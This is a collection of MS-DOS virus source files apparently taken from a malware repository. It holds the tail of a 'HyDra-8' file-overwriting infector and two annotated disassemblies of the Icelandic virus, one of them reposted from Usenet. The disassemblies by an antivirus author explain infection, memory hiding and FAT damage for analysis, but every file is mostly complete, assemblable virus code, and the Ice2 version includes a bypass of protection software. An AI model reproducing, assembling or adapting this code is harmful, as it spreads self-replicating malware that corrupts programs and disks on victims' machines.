;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_17e equ 1EFh
data_18e equ 1F2h
data_19e equ 9D9Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra8 proc far
start:
jmp loc_3
db 59h, 44h, 00h, 00h
data_3 db 'HyDra-8 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 18 dup (0)
data_10 db 0
db 10 dup (0)
data_11 db 0
db 0, 0, 0, 0, 0, 0
data_12 db 0
db 0, 0, 0, 0, 0, 0
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
data_13 db 2Ah
db 2Eh, 45h, 58h, 45h, 00h
data_14 db 33h
db 0C9h, 1Eh, 52h,0E8h, 06h, 00h
db 0E8h, 13h, 00h,0EBh, 36h, 90h
db 0BEh, 48h, 01h
db 0BFh, 5Ah, 01h,0B9h, 12h, 00h
locloop_1:
xor byte ptr [si],0F5h
movsb ; Mov [si] to es:[di]
loop locloop_1 ; Loop if cx > 0
retn
db 0B8h, 00h, 0Fh,0CDh, 10h,0B4h
db 00h,0CDh, 10h,0B8h, 00h, 02h
db 0B6h, 0Ch,0B2h, 1Fh,0CDh, 10h
db 33h,0D2h
db 0BAh, 5Ah, 01h,0B4h, 09h,0CDh
db 21h,0B8h, 00h, 02h,0B6h, 18h
db 0B2h, 00h,0CDh, 10h,0C3h
db 0B8h, 00h, 4Ch,0CDh, 21h, 00h
db 0A2h, 9Dh, 9Ah,0F5h, 9Ch, 86h
db 0F5h
db 0BFh, 9Ah, 9Dh, 9Bh,0F5h,0B2h
db 94h, 99h, 81h,0CAh,0D1h
loc_3:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,1EFh
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_4:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,1EFh
mov cs:data_8,ax
cmp word ptr ds:data_18e,4459h
jne loc_5 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_8 ; Jump if carry Set
jmp short loc_4
loc_5:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_6 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_6:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_7:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_11
db 90h
loc_8:
clc ; Clear carry flag
xor cx,cx ; Zero register
push ds
push dx
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov dx,offset data_13
mov ah,4Eh ; 'N'
xor cx,cx ; Zero register
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_7 ; Jump if carry Set
loc_9:
mov ah,3Ch ; '<'
xor cx,cx ; Zero register
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Ch
; create/truncate file @ ds:dx
mov bx,ax
jc loc_7 ; Jump if carry Set
mov ax,3D02h
mov dx,offset data_11
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
clc ; Clear carry flag
xor dx,dx ; Zero register
mov ah,40h ; '@'
mov dx,offset data_14
mov cx,5Ah
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
cmp ax,5Ah
jb loc_10 ; Jump if below
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
jc loc_10 ; Jump if carry Set
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jnc loc_9 ; Jump if carry=0
loc_10:
mov ax,4C00h
int 21h ; DOS Services ah=function 4Ch
; terminate with al=return code
loc_11:
xor di,di ; Zero register
mov si,offset data_15
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
data_15 db 1Eh
db 07h,0B9h,0FFh,0FFh,0BEh,0EFh
db 02h,0BFh, 00h, 01h, 2Bh,0CEh
db 0F3h,0A4h, 2Eh,0C7h, 06h, 00h
db 01h, 00h, 01h, 2Eh, 8Ch, 1Eh
db 02h, 01h, 8Bh,0C3h, 2Eh,0FFh
db 2Eh, 00h, 01h,0CDh
db 20h
hydra8 endp
seg_a ends
end start

558
MSDOS/Virus.MSDOS.Unknown.ice1.asm Normal file
View File

@ -0,0 +1,558 @@
; THE ICELANDIC "DISK-CRUNCHING" VIRUS
;
; Another possible name for this virus might be "One-in-ten", since
; it tries to infect every tenth program run. The Icelandic name for
; this virus ("Diskaetuvirus") translates to "Disk-eating virus"
;
; It was first located at one site in mid-June '89. It has since then
; been found at a few other places, but is quite rare yet. So far it
; does not seem to have spread to any other country.
;
; Disassembly done in June/July '89.
;
; The author of this program is unknown, but it appears to be of
; Icelandic origin.
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much. The code
; is very clear, and the virus is quite well written. It would be VERY
; easy to modify it to do something really harmful.
;
; A short description of the virus:
;
; It only infects .EXE files. Infected files grow by 656 to 671
; bytes, and the length of the infected file MOD 16 will always be 0.
; The virus attaches itself to the end of the programs it infects.
;
; When an infected file is run, the virus copies itself to top of
; free memory, and modifies the memory blocks, in order to hide from
; memory mapping programs. Some programs may overwrite this area,
; causing the computer to crash.
;
; The virus does nothing if some other program has hooked INT 13
; before it is run. This is probably done to avoid detection by
; protection programs, but it also means that many ordinary
; programs like SideKick and disk cache software will disable it.
; Even the PRINT command will disable the virus. This reduces the
; spread of the virus, but also greatly reduces the possibility that
; the virus will be detected.
;
; The virus will hook INT 21H and when function 4B (EXEC) is called
; it sometimes will infect the program being run. It will check every
; tenth program that is run for infection, and if it is not already
; infected, it will be.
;
; The virus will remove the Read-Only attribute before trying to
; infect programs.
;
; Infected files can be easily recognized, since they always end in
; 4418,5F19.
;
; To check for system infection, a byte at 0:37F is used - if it
; contains FF the virus is installed in memory.
;
; This virus is slightly harmful, but does no serious damage.
; On floppy-only, or machines with 10Mbyte hard disks it will do
; no damage at all, but on machines with larger hard disks it will
; select one unused entry in the FAT table, and mark it as bad, when it
; infects a file. Since the virus only modifies the first copy of the
; FAT, a quick fix is simply to copy the second table over the first.
; This is the only "mistake" I have found in this virus. It appears
; to be very well written - What a shame the programmer did not use
; his abilities for something more constructive.
;
; This file was created in the following way: I wrote a small program,
; that did nothing but write "Hello world!" and ran it several times,
; until it became infected. I then diassembled the program, changed
; it into an .ASM file, and worked on it until this file, when
; assembled, produced the same file as the original infected one.
;
; (Or almost the same - the checksum in the header is different).
;
VIRSIZ EQU 128
ASSUME CS:_TEXT,DS:_TEXT,SS:NOTHING,ES:NOTHING
;
; This is the original program.
;
_TEXT1 SEGMENT PARA PUBLIC 'CODE'
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
_TEXT SEGMENT PARA PUBLIC 'CODE'
;
; The virus is basically divided in three parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
; 3. The damage routine. It will select one unused cluster and mark it
; as bad.
;
VIRUS PROC FAR
;
; This is a fake MCB
;
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
LABEL1: SUB SP,4
PUSH BP
MOV BP,SP
PUSH AX
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
XOR AX,AX
MOV ES,AX
CMP ES:[37FH],BYTE PTR 0FFH
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; Check if INT 13 is 0070:xxxx or F000:xxxx. If not, assume some
; program is monitoring int 13, and quit.
;
L1: MOV AX,ES:[4EH]
CMP AX,0070H
JE L2
CMP AX,0F000H
JNE EXIT
;
; Set the installation flag, so infected programs run later will
; recognize the infection.
;
L2: MOV ES:[37FH],BYTE PTR 0FFH
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
MOV AH,52H
INT 21H
MOV AX,ES:[BX-2]
MOV ES,AX
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block. For some reason 2000
; bytes are transferred, when 656 would be enough. Maybe the author just
; wanted to leave room for future expansions.
;
MOV ES,BX
XOR SI,SI
XOR DI,DI
PUSH CS
POP DS
MOV CX,2000
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L3
PUSH AX
RET
;
; The main program modifies INT 21 next and finally returns to the
; original program. The original INT 21 vector is stored inside the
; program so a JMP [OLD INT21] instruction can be used.
;
L3: XOR AX,AX
MOV ES,AX
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
JMP EXIT
VIRUS ENDP
;
; This is the INT 21 replacement. It only does something in the case
; of an EXEC call.
;
NEW21 PROC FAR
CMP AH,4BH
JE L5
L4: DB 0EAH
OLD21 DW 0,0
;
; Only attack every tenth program run.
;
L5: DEC CS:[COUNTER]
JNE L4
MOV CS:[COUNTER],10
;
; Save all affected registers.
;
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DS
;
; Search for the file name extension ...
;
MOV BX,DX
L6: INC BX
CMP BYTE PTR [BX],'.'
JE L8
CMP BYTE PTR [BX],0
JNE L6
;
; ... and quit unless it starts with "EX".
;
L7: POP DS
POP SI
POP DX
POP CX
POP BX
POP AX
JMP L4
L8: INC BX
CMP WORD PTR [BX],5845H
JNE L7
;
; When an .EXE file is found, the virus starts by turning off
; the read-only attribute. The read-only attribute is not restored
; when the file has been infected.
;
MOV AX,4300H ; Get attribute
INT 21H
JC L7
MOV AX,4301H ; Set attribute
AND CX,0FEH
INT 21H
JC L7
;
; Next, the file is examined to see if it is already infected.
; The signature (4418 5F19) is stored in the last two words.
;
MOV AX,3D02H ; Open / write access
INT 21H
JC L7
MOV BX,AX ; file handle in BX
PUSH CS ; now DS is no longer needed
POP DS
;
; The header of the file is read in at [ID+8]. The virus then
; modifies itself, according to the information stored in the
; header. (The original CS and IP addressed are stored).
;
MOV DX,OFFSET ID+8
MOV CX,1CH
MOV AH,3FH
INT 21H
JC L9
MOV AX,DS:ID[1CH]
MOV DS:[ORG_IP],AX
MOV AX,DS:ID[1EH]
ADD AX,10H
MOV DS:[ORG_CS],AX
;
; Next the read/write pointer is moved to the end of the file-4,
; and the last 4 bytes read. They are compared to the signature,
; and if equal nothing happens.
;
MOV AX,4202H
MOV CX,-1
MOV DX,-4
INT 21H
JC L9
ADD AX,4
MOV DS:[LEN_LO],AX
JNC L8A
INC DX
L8A: MOV DS:[LEN_HI],DX
MOV AH,3FH
MOV CX,4
MOV DX,OFFSET ID+4
INT 21H
JNC L11
L9: MOV AH,3EH
INT 21H
L10: JMP L7
;
; Compare to 4418,5F19
;
L11: MOV SI,OFFSET ID+4
MOV AX,[SI]
CMP AX,4418H
JNE L12
MOV AX,[SI+2]
CMP AX,5F19H
JE L9
;
; The file is not infected, so the next thing the virus does is
; infecting it. First it is padded so the length becomes a multiple
; of 16 bytes. Tis is probably done so the virus code can start at a
; paragraph boundary.
;
L12: MOV AX,DS:[LEN_LO]
AND AX,0FH
JZ L13
MOV CX,16
SUB CX,AX
ADD DS:[LEN_LO],CX
JNC L12A
INC DS:[LEN_HI]
L12A: MOV AH,40H
INT 21H
JC L9
;
; Next the main body of the virus is written to the end.
;
L13: XOR DX,DX
MOV CX,OFFSET ID + 4
MOV AH,40H
INT 21H
JC L9
;
; Next the .EXE file header is modified:
;
; First modify initial IP
;
MOV AX,OFFSET LABEL1
MOV DS:ID[1CH],AX
;
; Modify starting CS = Virus CS. It is computed as:
;
; (Original length of file+padding)/16 - Start of load module
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SUB AX,DS:ID[10H]
MOV DS:ID[1EH],AX
;
; Modify length mod 512
;
ADD DS:[LEN_LO],OFFSET ID+4
JNC L14
INC DS:[LEN_HI]
L14: MOV AX,DS:[LEN_LO]
AND AX,511
MOV DS:ID[0AH],AX
;
; Modify number of blocks used
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
ADD AX,511
JNC L14A
INC DX
L14A: MOV AL,AH
MOV AH,DL
SHR AX,1
MOV DS:ID[0CH],AX
;
; Finally the modified header is written back to the start of the
; file.
;
QQQ: MOV AX,4200H
XOR CX,CX
XOR DX,DX
INT 21H
JC ENDIT
MOV AH,40H
MOV DX,OFFSET ID+8
MOV CX,1CH
INT 21H
JC ENDIT
MOV AH,3EH
INT 21H
JNC DAMAGE
;
; Infection is finished - close the file and execute it
;
ENDIT: JMP L9
NEW21 ENDP
;
; The damage routine. As before noted, it will only do damage on
; systems with a hard disk larger than 10Mbytes (With 16 bit FAT)
;
TEMP DW 0
;
; Start by getting some information about the current drive, like size
; of the FAT etc. Then compute the total number of sectors, and quit
; unless it is greater than 20740. This is probably done since larger
; disks use 16 bit FAT entries, instead of 12, which makes life easier
; for the programmer.
;
DAMAGE: MOV AH,32H
MOV DL,0
INT 21H
CMP AL,0FFH
JE L21
XOR AX,AX
MOV AL,[BX+4]
INC AX
MOV CS:[TEMP],AX
MOV AX,[BX+0DH]
DEC AX
MUL CS:[TEMP]
ADD AX,[BX+0BH]
JNC L15A
INC DX
L15A: CMP DX,0
JNE L15B
CMP AX,20740
JBE L21
;
; Check if DOS version is 4.0 or greater. If so, use a 16 bit value
; for numbers of sectors in the FAT, otherwise use a 8 bit entry.
;
L15B: PUSH BX
MOV AH,30H
INT 21H
POP BX
CMP AL,4
JAE L15
XOR AX,AX
MOV AL,[BX+0FH]
JMP SHORT L16
L15: MOV AX,[BX+0FH]
L16: ADD AX,[BX+6]
DEC AX
MOV DX,AX
MOV AL,[BX]
;
; Read the last sector in the first copy of the FAT. Search backwards
; for an unused entry. If none is found, read the sector before that
; and so on. If no free entry is found on the entire disk then quit.
;
L20: MOV CX,1
MOV BX,OFFSET ID+4
PUSH CS
POP DS
PUSH AX
PUSH DX
INT 25H
POPF
JC L21
POP DX
POP AX
MOV SI,510
L17: MOV BX,DS:[ID+4+SI]
CMP BX,0000
JE L19
CMP SI,0000
JE L18
DEC SI
DEC SI
JMP L17
L18: DEC DX
CMP DX,8
JE L21
JMP L20
;
; A free entry has been found. Make it look like a bad cluster, by
; changing the 0000 value to FFF7.
;
L19: MOV DS:[ID+4+SI],0FFF7H
MOV CX,1
MOV BX,OFFSET ID+4
INT 26H
POPF
L21: JMP L7
COUNTER DB 10
LEN_LO DW ?
LEN_HI DW ?
ID DW 4418H,5F19H ; The signature of the virus.
;
; A buffer, used for data from the file.
;
_TEXT ENDS
END LABEL1

; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

507
MSDOS/Virus.MSDOS.Unknown.ice2.asm Normal file
View File

@ -0,0 +1,507 @@
From netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair Tue Nov 29 09:54:55 1994
Xref: netcom.com alt.comp.virus:489
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!gatech!bloom-beacon.mit.edu!uhog.mit.edu!rutgers!engr.orst.edu!gaia.ucs.orst.edu!myhost.subdomain.domain!clair
From: clair@myhost.subdomain.domain (The Clairvoyant)
Newsgroups: alt.comp.virus
Subject: Ice2 Disassembly by f-prot author
Date: 28 Nov 1994 08:16:26 GMT
Organization: String to put in the Organization Header
Lines: 493
Message-ID: <3bc3kq$mjc@gaia.ucs.orst.edu>
NNTP-Posting-Host: tempest.rhn.orst.edu
X-Newsreader: TIN [version 1.2 PL2]
; THE ICELANDIC VIRUS - VERSION 2
;
; Disassembly done in July '89.
;
; The author(s) of this program is(are) unknown, but it is of
; Icelandic origin.
;
; All comments in this file were added by Fridrik Skulason,
; University of Iceland/Computing Services.
;
; INTERNET: frisk@rhi.hi.is
; UUCP: ...mcvax!hafro!rhi!frisk
; BIX: FRISK
;
; To anyone who obtains this file - please be careful with it, I
; would not like to see this virus be distributed too much. The code
; is very clear, and the virus is quite well written. It would be VERY
; easy to modify it to do something really harmful.
;
; The virus has the following flaws:
;
; It modifies the date of the program it infects, making
; it easy to spot them.
;
; It removes the Read-only attribute from files, but does
; not restore it.
;
; This version appears to do no damage at all. This, and the fact that
; the author(s) sent me a copy probably indicates that it was just
; designed to demonstrate that a virus like this could be written.
;
; This file was created in the following way:
;
; I disassembled the new version and compared it to my disassembly
; of version #1.
;
; Any changes found were added to this file.
;
VIRSIZ EQU 128
ASSUME CS:_TEXT,DS:NOTHING,SS:NOTHING,ES:NOTHING
;
; This is a dummy "infected" program, so that this file,
; when assembled (using MASM) will produce a "true" infected
; program.
;
_TEXT1 SEGMENT PARA PUBLIC 'CODE'
_START DB 0b4H,09H
PUSH CS
POP DS
MOV DX,OFFSET STRING
INT 21H
MOV AX,4C00H
INT 21H
STRING DB "Hello world!",0dh,0ah,"$"
_TEXT1 ENDS
_TEXT SEGMENT PARA PUBLIC 'CODE'
;
; The virus is basically divided in two parts.
;
; 1. The main program - run when an infected program is run.
; It will check if the system is already infected, and if not
; it will install the virus.
;
; 2. The new INT 21 handler. It will look for EXEC calls, and
; (sometimes) infect the program being run.
;
VIRUS PROC FAR
;
; This is a fake MCB
;
DB 'Z',00,00,VIRSIZ,0,0,0,0,0,0,0,0,0,0,0,0
;
; The virus starts by pushing the original start address on the stack,
; so it can transfer control there when finished.
;
LABEL1: SUB SP,4
PUSH BP
MOV BP,SP
PUSH AX
MOV AX,ES
;
; Put the the original CS on the stack. The ADD AX,data instruction
; is modified by the virus when it infects other programs.
;
DB 05H
ORG_CS DW 0010H
MOV [BP+4],AX
;
; Put the the original IP on the stack. This MOV [BP+2],data instruction
; is modified by the virus when it infects other programs.
;
DB 0C7H,46H,02H
ORG_IP DW 0000H
;
; Save all registers that are modified.
;
PUSH ES
PUSH DS
PUSH BX
PUSH CX
PUSH SI
PUSH DI
;
; Check if already installed. Quit if so.
;
XOR AX,AX
MOV ES,AX
CMP ES:[37FH],BYTE PTR 0FFH
JNE L1
;
; Restore all registers and return to the original program.
;
EXIT: POP DI
POP SI
POP CX
POP BX
POP DS
POP ES
POP AX
POP BP
RET
;
; The code to check if INT 13 contains something other than
; 0070 or F000 has been removed.
;
; Set the installation flag, so infected programs run later will
; recognize the infection.
;
L1: MOV ES:[37FH],BYTE PTR 0FFH
;
; The virus tries to hide from detection by modifying the memory block it
; uses, so it seems to be a block that belongs to the operating system.
;
; It looks rather weird, but it seems to work.
;
MOV AH,52H
INT 21H
;
; The next line is new - the virus obtains the segment of the
; IBMDOS.COM/MSDOS.SYS program.
;
MOV CS:[DOSSEG],ES
;
; Back to modification
;
MOV AX,ES:[BX-2]
MOV ES,AX
ADD AX,ES:[0003]
INC AX
INC AX
MOV CS:[0001],AX
;
; Next, the virus modifies the memory block of the infected program.
; It is made smaller, and no longer the last block.
;
MOV BX,DS
DEC BX
MOV DS,BX
MOV AL,'M'
MOV DS:[0000],AL
MOV AX,DS:[0003]
SUB AX,VIRSIZ
MOV DS:[0003],AX
ADD BX,AX
INC BX
;
; Then the virus moves itself to the new block. For some reason 2000
; bytes are transferred, when much less would be enough. Maybe the author just
; wanted to leave room for future expansions.
;
MOV ES,BX
XOR SI,SI
XOR DI,DI
PUSH CS
POP DS
MOV CX,2000
CLD
REP MOVSB
;
; The virus then transfers control to the new copy of itself.
;
PUSH ES
MOV AX,OFFSET L2
PUSH AX
RET
;
; This part of the program is new. It tries to bypass protection
; programs, by obtaining the original INT 21 address. It searches
; for the byte sequence 2E 3A 26, which (in DOS 3.1 and 3.3) is the
; beginning of the original interrupt (probably also in 3.2 - I do
; not have a copy of that)
;
L2: MOV DS,CS:[DOSSEG]
MOV CX,3000H
MOV SI,0
MOV AX,3A2EH
L3: CMP AX,[SI]
JE L3A
L3C: INC SI
LOOP L3
;
; If that fails, it searches for 80 FC 63 (used in 3.0)
; 80 FC 4B (used in 2.0)
; 80 FC F8 (This looks very odd -
; I have no idea what DOS version this might be.)
;
MOV CX,3000H
MOV SI,0
MOV AX,0FC80H
L3D: CMP AX,[SI]
JE L3F
L3E: INC SI
LOOP L3D
;
; Start of DOS not found - Give up (but remain in memory)
;
JMP EXIT
L3A: CMP BYTE PTR[SI+2],26H
JE L3B
JMP L3C
L3F: CMP BYTE PTR[SI+2],63H
JE L3B
CMP BYTE PTR[SI+2],4BH
JE L3B
CMP BYTE PTR[SI+2],0F8H
JE L3B
JMP L3E
L3B: MOV CS:[DOSPC],SI
;
; The main program modifies INT 21 next and finally returns to the
; original program. The original INT 21 vector is stored inside the
; program so a JMP [OLD INT21] instruction can be used.
;
XOR AX,AX
MOV ES,AX
MOV AX,ES:[0084H]
MOV CS:[OLD21],AX
MOV AX,ES:[0086H]
MOV CS:[OLD21+2],AX
MOV AX,CS
MOV ES:[0086H],AX
MOV AX,OFFSET NEW21
MOV ES:[0084H],AX
JMP EXIT
VIRUS ENDP
;
; This is the INT 21 replacement. It only does something in the case
; of an EXEC call.
;
NEW21 PROC FAR
CMP AH,4BH
JE L5
L4: DB 0EAH
OLD21 DW 0,0
;
; Only attack every tenth program run.
;
L5: DEC CS:[COUNTER]
JNE L4
MOV CS:[COUNTER],10
;
; Save all affected registers.
;
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DS
;
; Search for the file name extension ...
;
MOV BX,DX
L6: INC BX
CMP BYTE PTR [BX],'.'
JE L8
CMP BYTE PTR [BX],0
JNE L6
;
; ... and quit unless it starts with "EX".
;
L7: POP DS
POP SI
POP DX
POP CX
POP BX
POP AX
JMP L4
L8: INC BX
CMP WORD PTR [BX],5845H
JNE L7
;
; When an .EXE file is found, the virus starts by turning off
; the read-only attribute. The read-only attribute is not restored
; when the file has been infected.
;
; Here, as elsewhere, the INT 21 instructions have been replaced
; by PUSHF/CALL DWORD PTR CS:[DOSPC]
;
MOV AX,4300H ; Get attribute
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L7
MOV AX,4301H ; Set attribute
AND CX,0FEH
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L7
;
; Next, the file is examined to see if it is already infected.
; The signature (4418 5F19) is stored in the last two words.
;
MOV AX,3D02H ; Open / write access
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L7
MOV BX,AX ; file handle in BX
PUSH CS ; now DS is no longer needed
POP DS
;
; The header of the file is read in at [ID+8]. The virus then
; modifies itself, according to the information stored in the
; header. (The original CS and IP addressed are stored).
;
MOV DX,OFFSET ID+8
MOV CX,1CH
MOV AH,3FH
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L9
MOV AX,DS:ID[1CH]
MOV DS:[ORG_IP],AX
MOV AX,DS:ID[1EH]
ADD AX,10H
MOV DS:[ORG_CS],AX
;
; Next the read/write pointer is moved to the end of the file-4,
; and the last 4 bytes read. They are compared to the signature,
; and if equal nothing happens.
;
MOV AX,4202H
MOV CX,-1
MOV DX,-4
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L9
ADD AX,4
MOV DS:[LEN_LO],AX
JNC L8A
INC DX
L8A: MOV DS:[LEN_HI],DX
MOV AH,3FH
MOV CX,4
MOV DX,OFFSET ID+4
PUSHF
CALL DWORD PTR CS:[DOSPC]
JNC L11
L9: MOV AH,3EH
PUSHF
CALL DWORD PTR CS:[DOSPC]
L10: JMP L7
;
; Compare to 4418,5F19
;
L11: MOV SI,OFFSET ID+4
MOV AX,[SI]
CMP AX,4418H
JNE L12
MOV AX,[SI+2]
CMP AX,5F19H
JE L9
;
; The file is not infected, so the next thing the virus does is
; infecting it. First it is padded so the length becomes a multiple
; of 16 bytes. This is probably done so the virus code can start at a
; paragraph boundary.
;
L12: MOV AX,DS:[LEN_LO]
AND AX,0FH
JZ L13
MOV CX,16
SUB CX,AX
ADD DS:[LEN_LO],CX
JNC L12A
INC DS:[LEN_HI]
L12A: MOV AH,40H
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L9
;
; Next the main body of the virus is written to the end.
;
L13: XOR DX,DX
MOV CX,OFFSET ID + 4
MOV AH,40H
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC L9
;
; Next the .EXE file header is modified:
;
; First modify initial IP
;
MOV AX,OFFSET LABEL1
MOV DS:ID[1CH],AX
;
; Modify starting CS = Virus CS. It is computed as:
;
; (Original length of file+padding)/16 - Start of load module
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SHR DX,1
RCR AX,1
SUB AX,DS:ID[10H]
MOV DS:ID[1EH],AX
;
; Modify length mod 512
;
ADD DS:[LEN_LO],OFFSET ID+4
JNC L14
INC DS:[LEN_HI]
L14: MOV AX,DS:[LEN_LO]
AND AX,511
MOV DS:ID[0AH],AX
;
; Modify number of blocks used
;
MOV DX,DS:[LEN_HI]
MOV AX,DS:[LEN_LO]
ADD AX,511
JNC L14A
INC DX
L14A: MOV AL,AH
MOV AH,DL
SHR AX,1
MOV DS:ID[0CH],AX
;
; Finally the modified header is written back to the start of the
; file.
;
QQQ: MOV AX,4200H
XOR CX,CX
XOR DX,DX
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC ENDIT
MOV AH,40H
MOV DX,OFFSET ID+8
MOV CX,1CH
PUSHF
CALL DWORD PTR CS:[DOSPC]
JC ENDIT
MOV AH,3EH
PUSHF
CALL DWORD PTR CS:[DOSPC]
;
; Infection is finished - close the file and execute it.
;
ENDIT: JMP L9
;
; The damage section located here has been removed.
;
NEW21 ENDP
DOSPC DW ?
DOSSEG DW ?
COUNTER DB 10
LEN_LO DW ?
LEN_HI DW ?
